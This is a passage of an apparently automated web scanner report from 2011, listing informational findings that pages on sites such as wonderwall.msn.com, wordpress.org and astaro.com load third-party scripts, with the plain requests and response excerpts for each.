<script src="http://badge.facebook.com/badge/1070526700.33.897046733.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://embed.technorati.com/embed/bzftjmf2gh.js"></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/755007736-csitail.js"></script>
...[SNIP]...

18.358. http://wonderwall.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET / HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:41:28 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 76
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

18.359. http://wonderwall.msn.com/movies/best-actor-nominees-2011-11135.gallery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.msn.com
Path:	/movies/best-actor-nominees-2011-11135.gallery

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /movies/best-actor-nominees-2011-11135.gallery HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 15:35:51 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 148
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

18.360. http://wonderwall.msn.com/movies/gwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.msn.com
Path:	/movies/gwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /movies/gwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 15:35:52 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 138
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

18.361. http://wonderwall.msn.com/movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.msn.com
Path:	/movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 15:35:53 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 145
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

18.362. http://wonderwall.msn.com/movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.msn.com
Path:	/movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 15:35:53 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 147
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

18.363. http://wonderwall.msn.com/movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.msn.com
Path:	/movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://platform.twitter.com/widgets.js
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js

Request

GET /movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.364. http://wordpress.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wordpress.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://s.gravatar.com/js/gprofiles.js

Request

GET / HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Feb 2011 14:33:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 9160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head profile="
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.gravatar.com/js/gprofiles.js"></script>
...[SNIP]...

18.365. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The response dynamically includes the following script from another domain:

http://cache.addthiscdn.com/www/q0205/js/bookmark.js

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.366. http://www.amihackerproof.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amihackerproof.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-latest.js

Request

GET / HTTP/1.1
Host: www.amihackerproof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.367. http://www.answerbag.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.answerbag.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://tcr.tynt.com/javascripts/Tracer.js?user=a2UaPsAgSr35ldadbi-bpO&st=1
http://ui.abimg.net/js/min/answerbag.min.js?k=1296606488a
http://ui.abimg.net/js/min/prototaculous.min.js?k=1296606488a
http://vs.dmtracker.com/tags/vs.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.answerbag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:43:04 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8d PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=b8649a886ef35c1430866056a3b2b71c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-us
Content-Length: 80071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org
...[SNIP]...


       <script src="http://ui.abimg.net/js/min/prototaculous.min.js?k=1296606488a" type="text/javascript"></script>
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
               <script src="http://ui.abimg.net/js/min/answerbag.min.js?k=1296606488a" type="text/javascript"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://vs.dmtracker.com/tags/vs.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=a2UaPsAgSr35ldadbi-bpO&st=1"></script>
...[SNIP]...

18.368. http://www.astaro.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://platform.twitter.com/widgets.js

Request

GET / HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:06:41 GMT
ETag: "33573f0b0a043559c8057eb3ce5087cb"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 68532
Date: Tue, 01 Feb 2011 14:28:03 GMT
X-Varnish: 1753556136
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
<td class="table-social-iframes" width="1"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

18.369. http://www.astaro.com/advanced previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/advanced

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /advanced HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:12:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 40200
Date: Tue, 01 Feb 2011 14:28:00 GMT
X-Varnish: 1753556119 1753543080
Age: 914
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.370. http://www.astaro.com/buy-astaro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/buy-astaro

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /buy-astaro HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:29:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 46739
Date: Tue, 01 Feb 2011 14:30:04 GMT
X-Varnish: 1753558656 1753557653
Age: 41
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.371. http://www.astaro.com/callback previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/callback

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /callback HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:29:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 72280
Date: Tue, 01 Feb 2011 14:30:03 GMT
X-Varnish: 1753558643 1753558220
Age: 6
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.372. http://www.astaro.com/company/advanced previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/advanced

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /company/advanced HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:12:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 40208
Date: Tue, 01 Feb 2011 14:25:26 GMT
X-Varnish: 1753554062 1753542621
Age: 799
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.373. http://www.astaro.com/company/astaro-management-team previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/astaro-management-team

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /company/astaro-management-team HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:11:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 59737
Date: Tue, 01 Feb 2011 14:23:14 GMT
X-Varnish: 1753552185 1753541737
Age: 711
Via: 1.1 varnish
Connection: close

